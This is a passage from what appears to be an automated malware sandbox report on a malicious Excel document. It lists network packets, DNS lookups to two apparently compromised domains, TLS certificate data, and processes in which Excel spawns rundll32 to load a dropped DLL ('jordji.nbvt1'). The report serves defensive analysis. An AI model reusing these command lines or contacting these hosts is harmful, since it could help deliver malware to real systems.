                                                                                                                                                                                                May 4, 2021 05:34:34.697967052 CEST44349717192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.698725939 CEST44349717192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.698834896 CEST49717443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.699239969 CEST49717443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.702218056 CEST49717443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:34.865250111 CEST44349717192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:35.005177975 CEST44349717192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:35.005253077 CEST49717443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:35.005357027 CEST44349717192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:35.005405903 CEST49717443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:35.006694078 CEST49717443192.168.2.6192.185.5.2
                                                                                                                                                                                                May 4, 2021 05:34:35.169774055 CEST44349717192.185.5.2192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:03.612205029 CEST44349711192.185.20.98192.168.2.6

                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                May 4, 2021 05:34:13.211165905 CEST5451353192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:13.259721994 CEST53545138.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:14.319988012 CEST6204453192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:14.368755102 CEST53620448.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:15.956880093 CEST6379153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:16.005471945 CEST53637918.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:16.869535923 CEST6426753192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:16.919306040 CEST53642678.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:17.232769966 CEST4944853192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:17.291784048 CEST53494488.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:17.766428947 CEST6034253192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:17.817919970 CEST53603428.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:19.069087982 CEST6134653192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:19.126317978 CEST53613468.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:20.200444937 CEST5177453192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:20.249727011 CEST53517748.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:21.265224934 CEST5602353192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:21.335949898 CEST53560238.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:25.558737040 CEST5838453192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:25.611697912 CEST53583848.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:26.788894892 CEST6026153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:26.840564013 CEST53602618.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:27.636900902 CEST5606153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:27.693563938 CEST53560618.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:27.851682901 CEST5833653192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:27.910813093 CEST53583368.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:28.199352026 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:28.256129980 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:29.227767944 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:29.285995960 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:30.231647968 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:30.288358927 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.247755051 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:32.304538012 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.361454010 CEST5406453192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:32.412827969 CEST53540648.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:32.490313053 CEST5281153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:32.541685104 CEST53528118.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:33.300879002 CEST5529953192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:33.352365971 CEST53552998.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:33.628266096 CEST6374553192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:33.685090065 CEST53637458.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:34.233407974 CEST5005553192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:34.282016993 CEST53500558.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:35.227406025 CEST6137453192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:35.277509928 CEST53613748.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:36.313922882 CEST5378153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:36.371633053 CEST53537818.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:39.065938950 CEST5033953192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:39.122992992 CEST53503398.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:40.038610935 CEST6330753192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:40.097274065 CEST53633078.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:41.002331018 CEST4969453192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:41.051004887 CEST53496948.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:42.034831047 CEST5498253192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:42.083834887 CEST53549828.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:51.171436071 CEST5001053192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:51.223082066 CEST53500108.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:34:57.887327909 CEST6371853192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:34:57.952441931 CEST53637188.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:09.089742899 CEST6211653192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:09.267937899 CEST53621168.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:14.721524954 CEST6381653192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:14.884891033 CEST53638168.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:15.525814056 CEST5501453192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:15.698920012 CEST53550148.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:16.245860100 CEST6220853192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:16.305525064 CEST53622088.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:16.709208012 CEST5757453192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:16.766068935 CEST53575748.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:17.021526098 CEST5181853192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:17.092390060 CEST53518188.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:17.333512068 CEST5662853192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:17.393523932 CEST53566288.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:17.986257076 CEST6077853192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:18.034832954 CEST53607788.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:18.561402082 CEST5379953192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:18.621212959 CEST53537998.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:19.483438969 CEST5468353192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:19.544050932 CEST53546838.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:20.414757967 CEST5932953192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:20.472255945 CEST53593298.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:20.951368093 CEST6402153192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:21.013590097 CEST53640218.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:32.333846092 CEST5612953192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:32.395632029 CEST53561298.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:35:53.476849079 CEST5817753192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:35:53.571716070 CEST53581778.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:36:10.432703018 CEST5070053192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:36:10.489991903 CEST53507008.8.8.8192.168.2.6
                                                                                                                                                                                                May 4, 2021 05:36:14.292013884 CEST5406953192.168.2.68.8.8.8
                                                                                                                                                                                                May 4, 2021 05:36:14.350369930 CEST53540698.8.8.8192.168.2.6

                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                May 4, 2021 05:34:32.361454010 CEST192.168.2.68.8.8.80x9913Standard query (0)legalopspr.comA (IP address)IN (0x0001)
                                                                                                                                                                                                May 4, 2021 05:34:33.628266096 CEST192.168.2.68.8.8.80x8cefStandard query (0)dentistelmhurstny.comA (IP address)IN (0x0001)

                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                May 4, 2021 05:34:32.412827969 CEST8.8.8.8192.168.2.60x9913No error (0)legalopspr.com192.185.20.98A (IP address)IN (0x0001)
                                                                                                                                                                                                May 4, 2021 05:34:33.685090065 CEST8.8.8.8192.168.2.60x8cefNo error (0)dentistelmhurstny.com192.185.5.2A (IP address)IN (0x0001)

                                                                                                                                                                                                HTTPS Packets

                                                                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                May 4, 2021 05:34:32.748213053 CEST192.185.20.98443192.168.2.649711CN=legalopspr.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Jul 28 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Thu Jul 29 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                                                                CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                                                                May 4, 2021 05:34:34.018299103 CEST192.185.5.2443192.168.2.649715CN=www.dentistelmhurstny.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Mar 17 22:18:44 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Jun 15 23:18:44 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                                                CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                Statistics

                                                                                                                                                                                                CPU Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Memory Usage

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Behavior

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:05:34:25
                                                                                                                                                                                                Start date:04/05/2021
                                                                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                Imagebase:0x3c0000
                                                                                                                                                                                                File size:27110184 bytes
                                                                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:05:34:34
                                                                                                                                                                                                Start date:04/05/2021
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:rundll32 ..\jordji.nbvt1,DllRegisterServer
                                                                                                                                                                                                Imagebase:0x70000
                                                                                                                                                                                                File size:61952 bytes
                                                                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:05:34:35
                                                                                                                                                                                                Start date:04/05/2021
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:rundll32 ..\jordji.nbvt11,DllRegisterServer
                                                                                                                                                                                                Imagebase:0x70000
                                                                                                                                                                                                File size:61952 bytes
                                                                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Code Analysis

                                                                                                                                                                                                Reset < >